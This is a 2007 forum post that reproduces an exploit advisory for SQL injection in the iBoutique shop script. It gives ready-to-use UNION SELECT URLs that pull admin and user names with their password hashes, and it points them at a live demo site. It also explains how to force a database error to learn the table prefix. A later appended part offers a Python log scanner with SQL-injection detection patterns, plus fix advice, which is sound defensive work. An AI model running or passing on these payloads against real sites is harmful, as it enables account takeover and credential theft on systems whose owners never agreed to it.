Gonzalez
Posted June 28, 2007

--==+================================================================================+==--
--==+ iBoutique SQL Injection Vulnerabilities +==--
--==+================================================================================+==--

AUTHOR: t0pP8uZz & xprog
SCRIPT DOWNLOAD: N/A
SITE: http://www.wscreator.com
DORK: N/A

DESCRIPTION:
gain MD5 hash of any user including admin

EXPLOITS:
EXPLOIT 1 (admin): http://www.server.com/SCRIPT_PATH/index.php?mod=products&ID=-1 UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,@@version,7,8,9,10 FROM websiteadmin_admin_users
EXPLOIT 2 (users): http://www.server.com/SCRIPT_PATH/index.php?mod=products&ID=-1 UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,@@version,7,8,9,10 FROM websiteadmin_users

EXAMPLES:
EXAMPLE 1 ON DEMO: http://www.wscreator.com/iboutique/index.php?mod=products&ID=-1 UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,@@version,7,8,9,10 FROM websiteadmin_admin_users
EXAMPLE 2 ON DEMO: http://www.wscreator.com/iboutique/index.php?mod=products&ID=-1 UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,@@version,7,8,9,10 FROM websiteadmin_user

NOTE/TIP:
The table prefix may vary on different sites (on demo it's 'websiteadmin'). To get the prefix on other sites, you can cause an error the following way and show the SQL query:
http://server.com/iboutique/index.php?page='
That will spew out an error and you can then see the table prefix.

GREETZ: milw0rm.com, H4CKY0u.org, ~removed~ !
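For defenders running this script, the two request shapes in the post (SQL in the `ID` parameter and a lone quote in `page`) are easy to spot in web server access logs. The following is an added example, not part of the original post or of iBoutique; it assumes combined-format access logs and that legitimate product IDs are plain non-negative integers, and its log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [28/Jun/2007:10:00:01 +0000] "GET /iboutique/index.php?mod=products&ID=42 HTTP/1.1" 200 5120
198.51.100.9 - - [28/Jun/2007:10:00:05 +0000] "GET /iboutique/index.php?mod=products&ID=-1%20UNION%20ALL%20SELECT%201,2,3 HTTP/1.1" 200 6011
198.51.100.9 - - [28/Jun/2007:10:00:09 +0000] "GET /iboutique/index.php?page=%27 HTTP/1.1" 200 913
203.0.113.4 - - [28/Jun/2007:10:01:00 +0000] "GET /iboutique/index.php?page=about HTTP/1.1" 200 2048
"""

# Client IP, then the request target between the method and the protocol version.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# SQL fragments seen in the post, plus bare quotes (quotes can false-positive on free-text fields).
SQL_TOKENS = re.compile(r"union\s+(all\s+)?select|@@version|concat\s*\(|['\"]", re.I)

def classify(target):
    """Return the reasons a request target resembles the requests in the post."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("index.php"):
        return []
    reasons = []
    # parse_qsl percent-decodes values and turns '+' into a space.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # Assumption: a legitimate product ID is digits only.
        if name.lower() == "id" and not re.fullmatch(r"\d+", value):
            reasons.append("non-numeric ID")
        if SQL_TOKENS.search(value):
            reasons.append(f"SQL syntax in {name}")
    return reasons

def scan(log_text):
    """Return (client_ip, reasons) for every suspicious line in the log text."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m:
            reasons = classify(m.group(2))
            if reasons:
                hits.append((m.group(1), reasons))
    return hits

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, "; ".join(reasons))
```

The same integer check belongs in the application itself: cast `ID` to an integer and bind it as a query parameter, and turn off display of database errors so a failed query does not reveal table names.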